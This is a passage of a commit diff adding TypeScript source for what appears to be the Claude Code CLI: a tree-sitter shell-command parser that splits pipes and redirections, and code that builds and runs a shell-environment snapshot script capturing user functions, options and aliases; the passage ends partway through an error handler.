init claude-code

2026-04-01 17:32:37 +02:00
commit 73b208c009
1902 changed files with 513237 additions and 0 deletions
@@ -0,0 +1,318 @@
+import memoize from 'lodash-es/memoize.js'
+import {
+  extractOutputRedirections,
+  splitCommandWithOperators,
+} from './commands.js'
+import type { Node } from './parser.js'
+import {
+  analyzeCommand,
+  type TreeSitterAnalysis,
+} from './treeSitterAnalysis.js'
+
+export type OutputRedirection = {
+  target: string // text of the redirect destination as it appears in the command
+  operator: '>' | '>>' // which output-redirect operator was used
+}
+
+/**
+ * Interface for parsed command implementations.
+ * Both tree-sitter and regex fallback implementations conform to this.
+ *
+ * Contract, as realised by the implementations in this file:
+ * - `originalCommand` / `toString()`: the command string exactly as passed in.
+ * - `getPipeSegments()`: the command split at pipe operators; a command
+ *   with no pipes yields a single-element array holding the whole command.
+ * - `withoutOutputRedirections()`: the command with its output redirections
+ *   removed, or the original command when it has none.
+ * - `getOutputRedirections()`: the `{ target, operator }` pairs that were
+ *   found (empty when there are none).
+ */
+export interface IParsedCommand {
+  readonly originalCommand: string
+  toString(): string
+  getPipeSegments(): string[]
+  withoutOutputRedirections(): string
+  getOutputRedirections(): OutputRedirection[]
+  /**
+   * Returns tree-sitter analysis data if available.
+   * Returns null for the regex fallback implementation.
+   */
+  getTreeSitterAnalysis(): TreeSitterAnalysis | null
+}
+
+/**
+ * @deprecated Legacy regex/shell-quote path, kept only for environments
+ * where tree-sitter is unavailable. The primary gate is parseForSecurity
+ * (ast.ts).
+ *
+ * Fallback IParsedCommand that relies on the string helpers imported from
+ * `./commands.js` instead of an AST. It never has tree-sitter analysis data.
+ * Exported for testing purposes.
+ */
+export class RegexParsedCommand_DEPRECATED implements IParsedCommand {
+  readonly originalCommand: string
+
+  constructor(command: string) {
+    this.originalCommand = command
+  }
+
+  toString(): string {
+    return this.originalCommand
+  }
+
+  /**
+   * Splits the command at `|` tokens and re-joins each group of tokens with
+   * single spaces. Falls back to the whole command when splitting throws or
+   * produces nothing.
+   */
+  getPipeSegments(): string[] {
+    const wholeCommand = [this.originalCommand]
+    try {
+      // Open a fresh token group every time a `|` token is seen.
+      let group: string[] = []
+      const groups: string[][] = [group]
+      for (const token of splitCommandWithOperators(this.originalCommand)) {
+        if (token === '|') {
+          group = []
+          groups.push(group)
+        } else {
+          group.push(token)
+        }
+      }
+
+      // Groups left empty (leading, trailing or doubled pipes) are dropped.
+      const segments = groups
+        .filter(tokens => tokens.length > 0)
+        .map(tokens => tokens.join(' '))
+      return segments.length > 0 ? segments : wholeCommand
+    } catch {
+      return wholeCommand
+    }
+  }
+
+  /**
+   * Returns the command with output redirections stripped, or the original
+   * string untouched when no redirection is found.
+   */
+  withoutOutputRedirections(): string {
+    const command = this.originalCommand
+    // Cheap pre-check: without a `>` there is nothing to extract.
+    if (!command.includes('>')) {
+      return command
+    }
+    const extracted = extractOutputRedirections(command)
+    if (extracted.redirections.length === 0) {
+      return command
+    }
+    return extracted.commandWithoutRedirections
+  }
+
+  getOutputRedirections(): OutputRedirection[] {
+    return extractOutputRedirections(this.originalCommand).redirections
+  }
+
+  /** Always null: this implementation does not use tree-sitter. */
+  getTreeSitterAnalysis(): TreeSitterAnalysis | null {
+    return null
+  }
+}
+
+type RedirectionNode = OutputRedirection & {
+  startIndex: number // start offset of the whole `file_redirect` node, as reported by the parser
+  endIndex: number // end offset of the same node; used as the exclusive end when cutting it out
+}
+
+// Pre-order walk: call `visitor` on `node`, then on each child subtree in order.
+function visitNodes(node: Node, visitor: (node: Node) => void): void {
+  visitor(node)
+  node.children.forEach(child => visitNodes(child, visitor))
+}
+
+// Collects the start offset of every `|` token that is a direct child of a
+// `pipeline` node, in ascending order.
+function extractPipePositions(rootNode: Node): number[] {
+  const offsets: number[] = []
+  visitNodes(rootNode, current => {
+    if (current.type !== 'pipeline') {
+      return
+    }
+    const pipeTokens = current.children.filter(child => child.type === '|')
+    offsets.push(...pipeTokens.map(token => token.startIndex))
+  })
+  // A pipeline's own `|` tokens are recorded before the walk descends into
+  // its children, so pipes belonging to nested pipelines can arrive after
+  // pipes that sit further right in the source. getPipeSegments slices
+  // left-to-right and therefore needs the offsets sorted.
+  offsets.sort((left, right) => left - right)
+  return offsets
+}
+
+// Finds every `file_redirect` node that has both a `>`/`>>` operator child
+// and a `word` child, and records its span together with the operator and
+// the target text. Redirect nodes missing either child are ignored.
+function extractRedirectionNodes(rootNode: Node): RedirectionNode[] {
+  const found: RedirectionNode[] = []
+  visitNodes(rootNode, current => {
+    if (current.type !== 'file_redirect') {
+      return
+    }
+    const operatorNode = current.children.find(
+      child => child.type === '>' || child.type === '>>',
+    )
+    const targetNode = current.children.find(child => child.type === 'word')
+    if (!operatorNode || !targetNode) {
+      return
+    }
+    found.push({
+      startIndex: current.startIndex,
+      endIndex: current.endIndex,
+      target: targetNode.text,
+      operator: operatorNode.type as '>' | '>>',
+    })
+  })
+  return found
+}
+
+// IParsedCommand backed by offsets that were extracted from a tree-sitter AST.
+class TreeSitterParsedCommand implements IParsedCommand {
+  readonly originalCommand: string
+  // The parser reports startIndex/endIndex as UTF-8 byte offsets, whereas
+  // String.slice() counts UTF-16 code units. The two agree for ASCII only:
+  // `—` (U+2014) is 3 bytes but 1 code unit, so slicing the string with byte
+  // offsets would cut mid-token. All slicing is therefore done on the UTF-8
+  // Buffer and the result is decoded back to a string.
+  private readonly commandBytes: Buffer
+  private readonly pipePositions: number[]
+  private readonly redirectionNodes: RedirectionNode[]
+  private readonly treeSitterAnalysis: TreeSitterAnalysis
+
+  constructor(
+    command: string,
+    pipePositions: number[],
+    redirectionNodes: RedirectionNode[],
+    treeSitterAnalysis: TreeSitterAnalysis,
+  ) {
+    this.originalCommand = command
+    this.commandBytes = Buffer.from(command, 'utf8')
+    this.pipePositions = pipePositions
+    this.redirectionNodes = redirectionNodes
+    this.treeSitterAnalysis = treeSitterAnalysis
+  }
+
+  toString(): string {
+    return this.originalCommand
+  }
+
+  /**
+   * Cuts the command at each recorded pipe offset and returns the trimmed,
+   * non-empty pieces. With no pipes the whole command is the only segment.
+   */
+  getPipeSegments(): string[] {
+    if (this.pipePositions.length === 0) {
+      return [this.originalCommand]
+    }
+
+    // Segment i runs from just past the previous pipe up to the next pipe;
+    // the final segment runs to the end of the buffer.
+    const starts = [0, ...this.pipePositions.map(pipePos => pipePos + 1)]
+    const ends = [...this.pipePositions, this.commandBytes.length]
+
+    return starts
+      .map((start, i) =>
+        this.commandBytes.subarray(start, ends[i]).toString('utf8').trim(),
+      )
+      .filter(segment => segment !== '')
+  }
+
+  /**
+   * Removes every recorded redirection span from the command, then trims the
+   * result and collapses each whitespace run to a single space.
+   */
+  withoutOutputRedirections(): string {
+    if (this.redirectionNodes.length === 0) return this.originalCommand
+
+    // Cut from the back so earlier offsets stay valid after each removal.
+    const backToFront = [...this.redirectionNodes].sort(
+      (a, b) => b.startIndex - a.startIndex,
+    )
+    const stripped = backToFront.reduce<Buffer>(
+      (bytes, { startIndex, endIndex }) =>
+        Buffer.concat([bytes.subarray(0, startIndex), bytes.subarray(endIndex)]),
+      this.commandBytes,
+    )
+    return stripped.toString('utf8').trim().replace(/\s+/g, ' ')
+  }
+
+  /** Recorded redirections without their offsets. */
+  getOutputRedirections(): OutputRedirection[] {
+    return this.redirectionNodes.map(node => ({
+      target: node.target,
+      operator: node.operator,
+    }))
+  }
+
+  getTreeSitterAnalysis(): TreeSitterAnalysis {
+    return this.treeSitterAnalysis
+  }
+}
+
+// Memoized probe: tree-sitter counts as available when the parser module
+// loads and parsing a trivial command returns a non-null result. Any thrown
+// error is reported as "unavailable".
+const getTreeSitterAvailable = memoize(async (): Promise<boolean> => {
+  try {
+    const parser = await import('./parser.js')
+    const probe = await parser.parseCommand('echo test')
+    return probe !== null
+  } catch {
+    return false
+  }
+})
+
+/**
+ * Wraps an already-parsed AST root in a TreeSitterParsedCommand. Callers
+ * that hold the tree can use this to avoid the extra native.parse that
+ * ParsedCommand.parse would perform.
+ *
+ * @param command - The command string the tree was parsed from.
+ * @param root - Root node of that tree.
+ */
+export function buildParsedCommandFromRoot(
+  command: string,
+  root: Node,
+): IParsedCommand {
+  return new TreeSitterParsedCommand(
+    command,
+    extractPipePositions(root),
+    extractRedirectionNodes(root),
+    analyzeCommand(root, command),
+  )
+}
+
+// Parses `command` with tree-sitter when it is available and yields a
+// result; otherwise (unavailable, null parse result, or any thrown error)
+// returns the regex implementation. An empty command yields null.
+async function doParse(command: string): Promise<IParsedCommand | null> {
+  if (!command) return null
+
+  const regexFallback = (): IParsedCommand =>
+    new RegexParsedCommand_DEPRECATED(command)
+
+  if (!(await getTreeSitterAvailable())) {
+    return regexFallback()
+  }
+
+  try {
+    const parser = await import('./parser.js')
+    const parsed = await parser.parseCommand(command)
+    // Native NAPI parser returns plain JS objects (no WASM handles);
+    // nothing to free — extract directly.
+    return parsed
+      ? buildParsedCommandFromRoot(command, parsed.rootNode)
+      : regexFallback()
+  } catch {
+    return regexFallback()
+  }
+}
+
+// One-slot cache. Legacy callers (bashCommandIsSafeAsync,
+// buildSegmentWithoutRedirections) may invoke ParsedCommand.parse several
+// times in a row with the same string, and each parse() costs roughly one
+// native.parse plus about six tree walks. Remembering only the most recent
+// command avoids that repeat work while keeping at most one
+// TreeSitterParsedCommand alive through the cache.
+let lastCmd: string | undefined
+let lastResult: Promise<IParsedCommand | null> | undefined
+
+/**
+ * Entry point for working with shell commands. Parsing is quote-aware via
+ * tree-sitter when that is available and falls back to the regex-based
+ * implementation otherwise.
+ */
+export const ParsedCommand = {
+  /**
+   * Parses a command string into an IParsedCommand.
+   * Resolves to null if parsing fails completely.
+   */
+  parse(command: string): Promise<IParsedCommand | null> {
+    const cached = lastResult
+    if (cached !== undefined && lastCmd === command) {
+      return cached
+    }
+    lastCmd = command
+    const pending = doParse(command)
+    lastResult = pending
+    return pending
+  },
+}
@@ -0,0 +1,582 @@
+import { execFile } from 'child_process'
+import { execa } from 'execa'
+import { mkdir, stat } from 'fs/promises'
+import * as os from 'os'
+import { join } from 'path'
+import { logEvent } from 'src/services/analytics/index.js'
+import { registerCleanup } from '../cleanupRegistry.js'
+import { getCwd } from '../cwd.js'
+import { logForDebugging } from '../debug.js'
+import {
+  embeddedSearchToolsBinaryPath,
+  hasEmbeddedSearchTools,
+} from '../embeddedTools.js'
+import { getClaudeConfigHomeDir } from '../envUtils.js'
+import { pathExists } from '../file.js'
+import { getFsImplementation } from '../fsOperations.js'
+import { logError } from '../log.js'
+import { getPlatform } from '../platform.js'
+import { ripgrepCommand } from '../ripgrep.js'
+import { subprocessEnv } from '../subprocessEnv.js'
+import { quote } from './shellQuote.js'
+
+const LITERAL_BACKSLASH = '\\' // one backslash character, interpolated into the generated shell script text
+const SNAPSHOT_CREATION_TIMEOUT = 10000 // 10 seconds; passed as the execFile timeout for the snapshot shell
+
+/**
+ * Builds the source of a shell function named `funcName` that runs
+ * `binaryPath` with argv[0] set to `argv0`. This relies on the bun-internal
+ * ARGV0 dispatch trick: the bun binary inspects its argv[0] and runs the
+ * embedded tool (rg, bfs, ugrep) of that name.
+ *
+ * @param funcName - Name of the shell function to define.
+ * @param argv0 - Value the binary should see as argv[0].
+ * @param binaryPath - Path of the binary; shell-quoted before use.
+ * @param prependArgs - Arguments placed ahead of the caller's own args
+ *   (e.g., default flags). They are inserted literally, so each element must
+ *   already be a valid shell word (no spaces/special chars).
+ * @returns The function definition as newline-joined shell source.
+ */
+function createArgv0ShellFunction(
+  funcName: string,
+  argv0: string,
+  binaryPath: string,
+  prependArgs: string[] = [],
+): string {
+  const forwardedArgs = [...prependArgs, '"$@"'].join(' ')
+  const invocation = `${quote([binaryPath])} ${forwardedArgs}`
+  const viaEnvVar = `    ARGV0=${argv0} ${invocation}`
+  const viaExec = `exec -a ${argv0} ${invocation}`
+
+  const lines = [
+    `function ${funcName} {`,
+    '  if [[ -n $ZSH_VERSION ]]; then',
+    viaEnvVar,
+    '  elif [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]] || [[ "$OSTYPE" == "win32" ]]; then',
+    // Windows (git bash): `exec -a` does not work there, so rely on the
+    // ARGV0 env var, which the bun binary reads natively to set argv[0].
+    viaEnvVar,
+    '  elif [[ $BASHPID != $$ ]]; then',
+    `    ${viaExec}`,
+    '  else',
+    `    (${viaExec})`,
+    '  fi',
+    '}',
+  ]
+  return lines.join('\n')
+}
+
+/**
+ * Produces the shell snippet that makes `rg` available in the snapshot.
+ *
+ * @returns `type: 'function'` with a full function definition when the
+ *   ripgrep command needs a custom argv[0] (embedded, bun-internal ripgrep);
+ *   otherwise `type: 'alias'` with the shell-quoted path and arguments to use
+ *   as the alias target.
+ */
+export function createRipgrepShellIntegration(): {
+  type: 'alias' | 'function'
+  snippet: string
+} {
+  const { argv0, rgPath, rgArgs } = ripgrepCommand()
+
+  // Embedded ripgrep: only a shell function can set argv[0].
+  if (argv0) {
+    return {
+      type: 'function',
+      snippet: createArgv0ShellFunction('rg', argv0, rgPath),
+    }
+  }
+
+  // Regular ripgrep: quote the path and each argument as separate words.
+  const quotedWords = [rgPath, ...rgArgs].map(word => quote([word]))
+  return { type: 'alias', snippet: quotedWords.join(' ') }
+}
+
+/**
+ * VCS directories to exclude from grep searches. Matches the list in
+ * GrepTool (see GrepTool.ts: VCS_DIRECTORIES_TO_EXCLUDE).
+ *
+ * Each entry is turned into an `--exclude-dir=<name>` argument for the
+ * `grep` wrapper built by createFindGrepShellIntegration.
+ */
+const VCS_DIRECTORIES_TO_EXCLUDE = [
+  '.git',
+  '.svn',
+  '.hg',
+  '.bzr',
+  '.jj',
+  '.sl',
+] as const
+
+/**
+ * Creates shell integration for `find` and `grep`, backed by bfs and ugrep
+ * embedded in the bun binary (ant-native only). Unlike the rg integration,
+ * this always shadows the system find/grep since bfs/ugrep are drop-in
+ * replacements and we want consistent fast behavior.
+ *
+ * These wrappers replace the GlobTool/GrepTool dedicated tools (which are
+ * removed from the tool registry when embedded search tools are available),
+ * so they're tuned to match those tools' semantics, not GNU find/grep.
+ *
+ * `find` ↔ GlobTool:
+ * - Inject `-regextype findutils-default`: bfs defaults to POSIX BRE for
+ *   -regex, but GNU find defaults to emacs-flavor (which supports `\|`
+ *   alternation). Without this, `find . -regex '.*\.\(js\|ts\)'` silently
+ *   returns zero results. A later user-supplied -regextype still overrides.
+ * - No gitignore filtering: GlobTool passes `--no-ignore` to rg. bfs has no
+ *   gitignore support anyway, so this matches by default.
+ * - Hidden files included: both GlobTool (`--hidden`) and bfs's default.
+ *
+ * Caveat: even with findutils-default, Oniguruma (bfs's regex engine) uses
+ * leftmost-first alternation, not POSIX leftmost-longest. Patterns where
+ * one alternative is a prefix of another (e.g., `\(ts\|tsx\)`) may miss
+ * matches that GNU find catches. Workaround: put the longer alternative first.
+ *
+ * `grep` ↔ GrepTool (file filtering) + GNU grep (regex syntax):
+ * - `-G` (basic regex / BRE): GNU grep defaults to BRE where `\|` is
+ *   alternation. ugrep defaults to ERE where `|` is alternation and `\|` is a
+ *   literal pipe. Without -G, `grep "foo\|bar"` silently returns zero results.
+ *   User-supplied `-E`, `-F`, or `-P` later in argv overrides this.
+ * - `--ignore-files`: respect .gitignore (GrepTool uses rg's default, which
+ *   respects gitignore). Override with `grep --no-ignore-files`.
+ * - `--hidden`: include hidden files (GrepTool passes `--hidden` to rg).
+ *   Override with `grep --no-hidden`.
+ * - `--exclude-dir` for VCS dirs: GrepTool passes `--glob '!.git'` etc. to rg.
+ * - `-I`: skip binary files. rg's recursion silently skips binary matches
+ *   by default (different from direct-file-arg behavior); ugrep doesn't, so
+ *   we inject -I to match. Override with `grep -a`.
+ *
+ * Not replicated from GrepTool:
+ * - `--max-columns 500`: ugrep's `--width` hard-truncates output which could
+ *   break pipelines; rg's version replaces the line with a placeholder.
+ * - Read deny rules / plugin cache exclusions: require toolPermissionContext
+ *   which isn't available at shell-snapshot creation time.
+ *
+ * Returns null if embedded search tools are not available in this build.
+ */
+export function createFindGrepShellIntegration(): string | null {
+  if (!hasEmbeddedSearchTools()) {
+    return null
+  }
+  const binaryPath = embeddedSearchToolsBinaryPath()
+
+  const findFunction = createArgv0ShellFunction('find', 'bfs', binaryPath, [
+    '-regextype',
+    'findutils-default',
+  ])
+  const grepFunction = createArgv0ShellFunction('grep', 'ugrep', binaryPath, [
+    '-G',
+    '--ignore-files',
+    '--hidden',
+    '-I',
+    ...VCS_DIRECTORIES_TO_EXCLUDE.map(dir => `--exclude-dir=${dir}`),
+  ])
+
+  // The snapshot sources user aliases before these definitions, and bash
+  // expands aliases before it looks up functions. A renaming alias such as
+  // `alias find=gfind` or `alias grep=ggrep` (common on macOS with Homebrew
+  // GNU tools) would therefore silently bypass the embedded bfs/ugrep
+  // dispatch, so drop any such alias first (same fix the rg integration
+  // uses).
+  const clearAliases = ['find', 'grep'].map(
+    name => `unalias ${name} 2>/dev/null || true`,
+  )
+
+  return [...clearAliases, findFunction, grepFunction].join('\n')
+}
+
+// Maps a shell path to the rc file in the user's home directory: `.zshrc`
+// when the path mentions zsh, `.bashrc` when it mentions bash, and
+// `.profile` for anything else. zsh is checked first.
+function getConfigFile(shellPath: string): string {
+  let fileName = '.profile'
+  if (shellPath.includes('zsh')) {
+    fileName = '.zshrc'
+  } else if (shellPath.includes('bash')) {
+    fileName = '.bashrc'
+  }
+  return join(os.homedir(), fileName)
+}
+
+/**
+ * Generates user-specific snapshot content (functions, options, aliases)
+ * This content is derived from the user's shell configuration file
+ *
+ * The returned text is a shell-script fragment. When run, it appends three
+ * sections to "$SNAPSHOT_FILE":
+ * - "# Functions": the shell's function definitions, skipping names that
+ *   start with a single underscore. The bash variant base64-encodes each
+ *   definition and writes an `eval` line that decodes it.
+ * - "# Shell Options": the options currently enabled (plus
+ *   `shopt -s expand_aliases` for non-zsh shells).
+ * - "# Aliases": the current aliases, rewritten as `alias -- ...` lines.
+ *
+ * @param configFile - Path of the user's shell config file; only its suffix
+ *   is inspected, to choose between zsh and bash syntax.
+ * @returns The script fragment.
+ */
+function getUserSnapshotContent(configFile: string): string {
+  const isZsh = configFile.endsWith('.zshrc')
+
+  let content = ''
+
+  // User functions
+  if (isZsh) {
+    content += `
+      echo "# Functions" >> "$SNAPSHOT_FILE"
+
+      # Force autoload all functions first
+      typeset -f > /dev/null 2>&1
+
+      # Now get user function names - filter completion functions (single underscore prefix)
+      # but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
+      typeset +f | grep -vE '^_[^_]' | while read func; do
+        typeset -f "$func" >> "$SNAPSHOT_FILE"
+      done
+    `
+  } else {
+    content += `
+      echo "# Functions" >> "$SNAPSHOT_FILE"
+
+      # Force autoload all functions first
+      declare -f > /dev/null 2>&1
+
+      # Now get user function names - filter completion functions (single underscore prefix)
+      # but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
+      declare -F | cut -d' ' -f3 | grep -vE '^_[^_]' | while read func; do
+        # Encode the function to base64, preserving all special characters
+        encoded_func=$(declare -f "$func" | base64 )
+        # Write the function definition to the snapshot
+        echo "eval ${LITERAL_BACKSLASH}"${LITERAL_BACKSLASH}$(echo '$encoded_func' | base64 -d)${LITERAL_BACKSLASH}" > /dev/null 2>&1" >> "$SNAPSHOT_FILE"
+      done
+    `
+  }
+
+  // Shell options
+  if (isZsh) {
+    content += `
+      echo "# Shell Options" >> "$SNAPSHOT_FILE"
+      setopt | sed 's/^/setopt /' | head -n 1000 >> "$SNAPSHOT_FILE"
+    `
+  } else {
+    // `set -o` prints one "<name> <on|off>" line per option. Select on the
+    // state column: matching the substring "on" anywhere in the line would
+    // also pick up disabled options whose *name* contains "on" (e.g.
+    // `monitor`, `onecmd`) and wrongly enable them in the snapshot.
+    content += `
+      echo "# Shell Options" >> "$SNAPSHOT_FILE"
+      shopt -p | head -n 1000 >> "$SNAPSHOT_FILE"
+      set -o | awk '$2 == "on" {print "set -o " $1}' | head -n 1000 >> "$SNAPSHOT_FILE"
+      echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"
+    `
+  }
+
+  // User aliases
+  content += `
+      echo "# Aliases" >> "$SNAPSHOT_FILE"
+      # Filter out winpty aliases on Windows to avoid "stdin is not a tty" errors
+      # Git Bash automatically creates aliases like "alias node='winpty node.exe'" for
+      # programs that need Win32 Console in mintty, but winpty fails when there's no TTY
+      if [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]]; then
+        alias | grep -v "='winpty " | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
+      else
+        alias | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
+      fi
+  `
+
+  return content
+}
+
+/**
+ * Generates Claude Code specific snapshot content
+ * This content is always included regardless of user configuration
+ *
+ * The returned text is a shell-script fragment that appends to
+ * "$SNAPSHOT_FILE", in this order:
+ * - an `if ! ... command -v rg ...; then ... fi` guard wrapping either an
+ *   `rg` function definition or an `rg` alias, depending on what
+ *   createRipgrepShellIntegration() returns;
+ * - the find/grep wrapper functions, only when
+ *   createFindGrepShellIntegration() returns a non-null snippet;
+ * - an `export PATH=...` line carrying the shell-quoted PATH value.
+ *
+ * @returns Promise resolving to the script fragment.
+ */
+async function getClaudeCodeSnapshotContent(): Promise<string> {
+  // Get the appropriate PATH based on platform
+  let pathValue = process.env.PATH
+  if (getPlatform() === 'windows') {
+    // On Windows with git-bash, read the Cygwin PATH
+    const cygwinResult = await execa('echo $PATH', {
+      shell: true,
+      reject: false,
+    })
+    if (cygwinResult.exitCode === 0 && cygwinResult.stdout) {
+      pathValue = cygwinResult.stdout.trim()
+    }
+    // Fall back to process.env.PATH if we can't get Cygwin PATH
+  }
+
+  const rgIntegration = createRipgrepShellIntegration()
+
+  let content = ''
+
+  // Check if rg is available, if not create an alias/function to bundled ripgrep
+  // We use a subshell to unalias rg before checking, so that user aliases like
+  // `alias rg='rg --smart-case'` don't shadow the real binary check. The subshell
+  // ensures we don't modify the user's aliases in the parent shell.
+  content += `
+      # Check for rg availability
+      echo "# Check for rg availability" >> "$SNAPSHOT_FILE"
+      echo "if ! (unalias rg 2>/dev/null; command -v rg) >/dev/null 2>&1; then" >> "$SNAPSHOT_FILE"
+  `
+
+  if (rgIntegration.type === 'function') {
+    // For embedded ripgrep, write the function definition using heredoc
+    content += `
+      cat >> "$SNAPSHOT_FILE" << 'RIPGREP_FUNC_END'
+  ${rgIntegration.snippet}
+RIPGREP_FUNC_END
+    `
+  } else {
+    // For regular ripgrep, write a simple alias
+    const escapedSnippet = rgIntegration.snippet.replace(/'/g, "'\\''")
+    content += `
+      echo '  alias rg='"'${escapedSnippet}'" >> "$SNAPSHOT_FILE"
+    `
+  }
+
+  content += `
+      echo "fi" >> "$SNAPSHOT_FILE"
+  `
+
+  // For ant-native builds, shadow find/grep with bfs/ugrep embedded in the bun
+  // binary. Unlike rg (which only activates if system rg is absent), we always
+  // shadow find/grep since bfs/ugrep are drop-in replacements and we want
+  // consistent fast behavior in Claude's shell.
+  const findGrepIntegration = createFindGrepShellIntegration()
+  if (findGrepIntegration !== null) {
+    content += `
+      # Shadow find/grep with embedded bfs/ugrep (ant-native only)
+      echo "# Shadow find/grep with embedded bfs/ugrep" >> "$SNAPSHOT_FILE"
+      cat >> "$SNAPSHOT_FILE" << 'FIND_GREP_FUNC_END'
+${findGrepIntegration}
+FIND_GREP_FUNC_END
+    `
+  }
+
+  // Add PATH to the file
+  content += `
+
+      # Add PATH to the file
+      echo "export PATH=${quote([pathValue || ''])}" >> "$SNAPSHOT_FILE"
+  `
+
+  return content
+}
+
+/**
+ * Creates the appropriate shell script for capturing environment
+ *
+ * The script sets SNAPSHOT_FILE, optionally sources the user's config file
+ * with stdin redirected from /dev/null, truncates the snapshot file, writes
+ * an `unalias -a` line into it, then runs the user-specific and Claude Code
+ * fragments, and finally exits with status 1 if the snapshot file does not
+ * exist.
+ *
+ * @param shellPath - Path of the shell; used to pick the config file name.
+ * @param snapshotFilePath - Where the script writes the snapshot
+ *   (shell-quoted before being embedded).
+ * @param configFileExists - Whether the config file was found. When false
+ *   the file is not sourced and no user content is captured; for non-zsh
+ *   shells a lone `shopt -s expand_aliases` line is still written.
+ * @returns Promise resolving to the full script text.
+ */
+async function getSnapshotScript(
+  shellPath: string,
+  snapshotFilePath: string,
+  configFileExists: boolean,
+): Promise<string> {
+  const configFile = getConfigFile(shellPath)
+  const isZsh = configFile.endsWith('.zshrc')
+
+  // Generate the user content and Claude Code content
+  const userContent = configFileExists
+    ? getUserSnapshotContent(configFile)
+    : !isZsh
+      ? // we need to manually force alias expansion in bash - normally `getUserSnapshotContent` takes care of this
+        'echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"'
+      : ''
+  const claudeCodeContent = await getClaudeCodeSnapshotContent()
+
+  const script = `SNAPSHOT_FILE=${quote([snapshotFilePath])}
+      ${configFileExists ? `source "${configFile}" < /dev/null` : '# No user config file to source'}
+
+      # First, create/clear the snapshot file
+      echo "# Snapshot file" >| "$SNAPSHOT_FILE"
+
+      # When this file is sourced, we first unalias to avoid conflicts
+      # This is necessary because aliases get "frozen" inside function definitions at definition time,
+      # which can cause unexpected behavior when functions use commands that conflict with aliases
+      echo "# Unset all aliases to avoid conflicts with functions" >> "$SNAPSHOT_FILE"
+      echo "unalias -a 2>/dev/null || true" >> "$SNAPSHOT_FILE"
+
+      ${userContent}
+
+      ${claudeCodeContent}
+
+      # Exit silently on success, only report errors
+      if [ ! -f "$SNAPSHOT_FILE" ]; then
+        echo "Error: Snapshot file was not created at $SNAPSHOT_FILE" >&2
+        exit 1
+      fi
+    `
+
+  return script
+}
+
+/**
+ * Creates and saves the shell environment snapshot by loading the user's shell configuration
+ *
+ * This function is a critical part of Claude CLI's shell integration strategy. It:
+ *
+ * 1. Identifies the user's shell config file (.zshrc, .bashrc, etc.)
+ * 2. Creates a temporary script that sources this configuration file
+ * 3. Captures the resulting shell environment state including:
+ *    - Functions defined in the user's shell configuration
+ *    - Shell options and settings that affect command behavior
+ *    - Aliases that the user has defined
+ *
+ * The snapshot is saved to a temporary file that can be sourced by subsequent shell
+ * commands, ensuring they run with the user's expected environment, aliases, and functions.
+ *
+ * This approach allows Claude CLI to execute commands as if they were run in the user's
+ * interactive shell, while avoiding the overhead of creating a new login shell for each command.
+ * It handles both Bash and Zsh shells with their different syntax for functions, options, and aliases.
+ *
+ * If the snapshot creation fails (e.g., timeout, permissions issues), the CLI will still
+ * function but without the user's custom shell environment, potentially missing aliases
+ * and functions the user relies on.
+ *
+ * Implementation notes:
+ * - The snapshot is written to the `shell-snapshots` directory under the
+ *   Claude config home, with a file name built from the shell type, the
+ *   current timestamp and a short random id.
+ * - The script runs via execFile with SNAPSHOT_CREATION_TIMEOUT and a 1MB
+ *   output buffer. When CLAUDE_CODE_DONT_INHERIT_ENV is set, only SHELL,
+ *   GIT_EDITOR and CLAUDECODE are passed in the environment.
+ * - On success a cleanup callback is registered that unlinks the snapshot
+ *   file.
+ * - The failure paths handled here (exec error, missing snapshot file,
+ *   exception during setup) log, emit an analytics event and resolve
+ *   `undefined` rather than rejecting.
+ *
+ * @param binShell - Path of the shell binary to run; also used to infer the
+ *   shell type (zsh, bash, otherwise sh) and the config file to source.
+ * @returns Promise that resolves to the snapshot file path or undefined if creation failed
+ */
+export const createAndSaveSnapshot = async (
+  binShell: string,
+): Promise<string | undefined> => {
+  const shellType = binShell.includes('zsh')
+    ? 'zsh'
+    : binShell.includes('bash')
+      ? 'bash'
+      : 'sh'
+
+  logForDebugging(`Creating shell snapshot for ${shellType} (${binShell})`)
+
+  return new Promise(async resolve => {
+    try {
+      const configFile = getConfigFile(binShell)
+      logForDebugging(`Looking for shell config file: ${configFile}`)
+      const configFileExists = await pathExists(configFile)
+
+      if (!configFileExists) {
+        logForDebugging(
+          `Shell config file not found: ${configFile}, creating snapshot with Claude Code defaults only`,
+        )
+      }
+
+      // Create unique snapshot path with timestamp and random ID
+      const timestamp = Date.now()
+      const randomId = Math.random().toString(36).substring(2, 8)
+      const snapshotsDir = join(getClaudeConfigHomeDir(), 'shell-snapshots')
+      logForDebugging(`Snapshots directory: ${snapshotsDir}`)
+      const shellSnapshotPath = join(
+        snapshotsDir,
+        `snapshot-${shellType}-${timestamp}-${randomId}.sh`,
+      )
+
+      // Ensure snapshots directory exists
+      await mkdir(snapshotsDir, { recursive: true })
+
+      const snapshotScript = await getSnapshotScript(
+        binShell,
+        shellSnapshotPath,
+        configFileExists,
+      )
+      logForDebugging(`Creating snapshot at: ${shellSnapshotPath}`)
+      logForDebugging(`Execution timeout: ${SNAPSHOT_CREATION_TIMEOUT}ms`)
+      execFile(
+        binShell,
+        ['-c', '-l', snapshotScript],
+        {
+          env: {
+            ...((process.env.CLAUDE_CODE_DONT_INHERIT_ENV
+              ? {}
+              : subprocessEnv()) as typeof process.env),
+            SHELL: binShell,
+            GIT_EDITOR: 'true',
+            CLAUDECODE: '1',
+          },
+          timeout: SNAPSHOT_CREATION_TIMEOUT,
+          maxBuffer: 1024 * 1024, // 1MB buffer
+          encoding: 'utf8',
+        },
+        async (error, stdout, stderr) => {
+          if (error) {
+            const execError = error as Error & {
+              killed?: boolean
+              signal?: string
+              code?: number
+            }
+            logForDebugging(`Shell snapshot creation failed: ${error.message}`)
+            logForDebugging(`Error details:`)
+            logForDebugging(`  - Error code: ${execError?.code}`)
+            logForDebugging(`  - Error signal: ${execError?.signal}`)
+            logForDebugging(`  - Error killed: ${execError?.killed}`)
+            logForDebugging(`  - Shell path: ${binShell}`)
+            logForDebugging(`  - Config file: ${getConfigFile(binShell)}`)
